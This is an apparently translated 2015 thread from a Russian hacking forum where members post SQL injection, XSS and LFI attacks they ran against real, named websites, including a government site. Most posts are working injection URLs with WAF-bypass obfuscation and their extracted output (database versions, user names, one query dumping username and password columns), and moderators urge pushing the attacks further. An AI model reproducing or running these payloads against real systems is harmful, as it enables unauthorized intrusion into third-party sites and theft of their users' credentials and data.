SQLi, XSS and other vulnerabilities.

Discussion in 'Sandbox' (Песочница) started by Егорыч+++, 10 May 2015.

  1. Егорыч+++ (Staff Member)
    This thread is only for publishing vulnerabilities that you found personally. Any honestly found vulnerability adds to your reputation. The thread is exclusively for newcomers.

    Before posting, check whether the vulnerability you found has already been published. You can do it like this:
    Google:
    Code:
    site:antichat.ru ваш_сайт_с_уязвимостью.ру
    Don't forget that you need to write an exploit with output for SQLi, pop alert() for XSS, read /etc/passwd for LFI, and so on.

    #1 Егорыч+++, 10 May 2015
    Last edited by a moderator: 31 May 2015
  2. BabaDook (Well-Known Member)
    Two: http://www.webbonus.net.ua/bitcoin-s.php?sait=-10'+/*!12345union*/+/*!12345select*/ 1,2,3,4,5,6,7,8,database/*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*/(),10+--+ '-
    By the way, there's a WAF here, and I used the buffer overflow technique. P.S. I couldn't find any articles on this subject anywhere, and there are very few manuals about WAF bypass etc.
  3. BabaDook (Well-Known Member)
    Three: LFI

    http://greyslon.ru/index.php

    POST
    action=register
    &ajax=true
    &data=login%3De%26email%3De%26pass%3De%26repass%3De%26payeer%3De%26captcha%3De
    &page=../info
    Also this: http://greyslon.ru/htaccess. I don't know whether reading this file counts as a vulnerability or not.
  4. BabaDook (Well-Known Member)
    bidderland.co.in/siteadmin
    This vulnerability is exploited in 5 seconds.
    It wasn't me who found it, but it's very interesting, not typical. Whoever has figured it out, please keep it a secret.
  5. WallHack (Elder)
    Why didn't you take it further?
    Code:
    http://www.c2-int.com/news-full.php?id=-1278+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14+--+
    Version: 5.5.43-37.2
    User: c2deuts_ice@localhost
    -----------------------------
    Why make several posts? You can put everything in one.
    #5 WallHack, 10 May 2015
    Last edited: 10 May 2015
  6. BigBear (Staff Member, Escrow Service)
    Take the vulnerabilities further. Try to come up with an attack vector. We are not selecting you just so that you can simply find something.
  7. frank (Member)
    HTML:
    http://www.asep7.gov.la/show.php?id=15%27+and+12=16+union+select+1,2,3,4,version%28%29,6,7,8,9,10,11,12+--+
    5.5.40-0ubuntu0.12.04.1 - output in the page title

    HTML:
    http://www.minddesign.co.uk/show.php?id=483%27+and+34=-2+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16+--+
    5.6.23

    HTML:
    http://www.psych-it.com.au/Psychlopedia/article.asp?id=277+AND+568=-3+union+select+1,concat%28username,0x3a,pass%29,3,4,5,6+from+users+limit+10,1+--+
    4.1.18-nt
     
  8. frank (Member)
    HTML:
    http://www.damico.co.za/staff_profile.asp?STAFF_ID=3+and+12=0+union+select+1,user%28%29,database%28%29,version%28%29,5+--+
    [email protected]
    idserver_damicodb
    5.5.42-cll
     
  9. Mister_Bert0ni (Reservists Of Antichat)
    http://goo.gl/imjzsb
    http://goo.gl/8IKVeV
    http://goo.gl/wYRBLz

    http://emofans.ru/gallery/emowallp/
    POST_DATA:
    foto_msort=&foto_sort=null and ++POLYGON((select*from(select*from(select+concat(0x7e7e496e6a6563746564204279204d69737465725f42657274306e697e7e,0x203a3a204461746162617365203a3a ,database(),0x202056657273696f6e203a3a20,version())e)f)x)) -- -



    https://www.choosewellness.com.ph/campus-vote_video-entry.php?id=5 and(select!x-~0.+from(select(select+group_concat(0x3c7370616e207374796c653d22666f6e742d66616d696c793a4963656c616e643b636f6c6f723a7265643b73697a653a353b746578742d736861646f773a23303030203070782030707820337078223e4d69737465725f42657274306e693c62723e,0x4461746162617365203a3a202020,DATABASE(),0x3c62723e506f727420203a3a2020,@@PORT,0x3c62723e46696c6573797374656d203a3a2020,@@VERSION_COMPILE_OS,0x20203a3a2020,@@VERSION_COMPILE_MACHINE,0x3c62723e56657273696f6e206f66204461746162617365203a3a2020,version(),0xa3c62723e486f73746e616d65203a3a20,@@HOSTNAME,0x3c2f7370616e3e))x)x)
    #9 Mister_Bert0ni, 10 May 2015
    Last edited: 11 May 2015
  10. Mister_Bert0ni (Reservists Of Antichat)
    SQLi demonstration by me
  11. Mister_Bert0ni (Reservists Of Antichat)
    SQLi demonstration by me
  12. Mister_Bert0ni (Reservists Of Antichat)
    SQLi on the bitbank site
  13. Mister_Bert0ni (Reservists Of Antichat)
    Yes, yes, 5 seconds is even too long)))
  14. rezistor (New Member)
  15. Arboretum (Member)
    http://java.lordy.ru/
    There's a Java game; after registering, you can write "><script>alert(XSS)</script>" in the chat, after which XSS will pop up on java.lordy.ru.
  16. frank (Member)
    HTML:
    http://www.jhewlett.com/content/humor.php?id=10%27+and+1=-0+union+select+user%28%29,group_concat%28database%28%29,0x3a,version%28%29%29+--+
    [email protected]
    jhewlett_prod:5.0.96-log

    HTML:
    http://nightgallery.ca/event.php?id=91+or+1+group%20by%20concat_ws%280x2a,version%28%29,user%28%29,database%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--+
    5.0.96-log
    [email protected]
    nightgallery20

    HTML:
    http://www.australianpaddlesurfer.com.au/review.php?id=113+or+2+group%20by%20concat_ws%280x2f,version%28%29,user%28%29,database%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--+
    10.0.17-MariaDB-cll-lve
    [email protected]4.au.syr

    HTML:
    http://www.novagora.net/rub.php?Rub=0&IDR=5+and+2=0+union+select+1,2,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,4,5+--+
    4.0.26-standard-log
    novagoraTest
    [email protected]
     
  17. Zen1T21 (Member)
  18. tiger_x (New Member)
    HTML:
    http://www.oar.org.ro/press.php?id=-1%20union%20all%20select%20null,null,null,version%28%29,null,null%20--
    Version: 5.6.23
    User: oarorgro_oar@localhost
     
  19. rezistor (New Member)
    XSS :)
    http://gov.cap.ru/?__VIEWSTATE=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&ctl00$Search1$BtnSearch=&__VIEWSTATEGENERATOR=CA0B0334&ctl00$Search1$TextSearch=античат<script>alert()</script>&__EVENTVALIDATION=/wEWBwK1y/X1DALNk6LCAwKbnsfFCAK8lLmCCQLC9M+dCwKC1JS2BwKjz9/DAXkyh+c6G8rMsfjzrV2Wjy6zi7nnNfiqJHMfqPO+S6mI&ctl00$Comments=античат&ctl00$ErrorText=
  20. Mister_Bert0ni (Reservists Of Antichat)
    http://goo.gl/uMgvlO
    Code:
    http://www.perio.com.ua/articles.php?id=.13 and @b:=current_user()+/*!50000UNIoN+Select*/+1,concat/*_*/(0x3c7370616e207374796c653d22666f6e742d66616d696c793a4963656c616e643b636f6c6f723a7265643b73697a653a353b746578742d736861646f773a23303030203070782030707820337078223e4d69737465725f42657274306e693c62723e,0x4461746162617365203a3a202020,DATABASE/**_**/(),0x3c62723e506f727420203a3a2020,@@port,0x3c62723e43757272656e745f55736572203a3a202020203a3a  ,@b,0x3c62723e56657273696f6e206f66204461746162617365203a3a2020,VERSION(),0xa3c62723e486f73746e616d65203a3a20,0x3c2f7370616e3e,@@HOSTNAME),3,1337,5,6 -- -
    Does anyone know how to bypass the WAF on information_schema here?
    #20 Mister_Bert0ni, 11 May 2015
    Last edited: 12 May 2015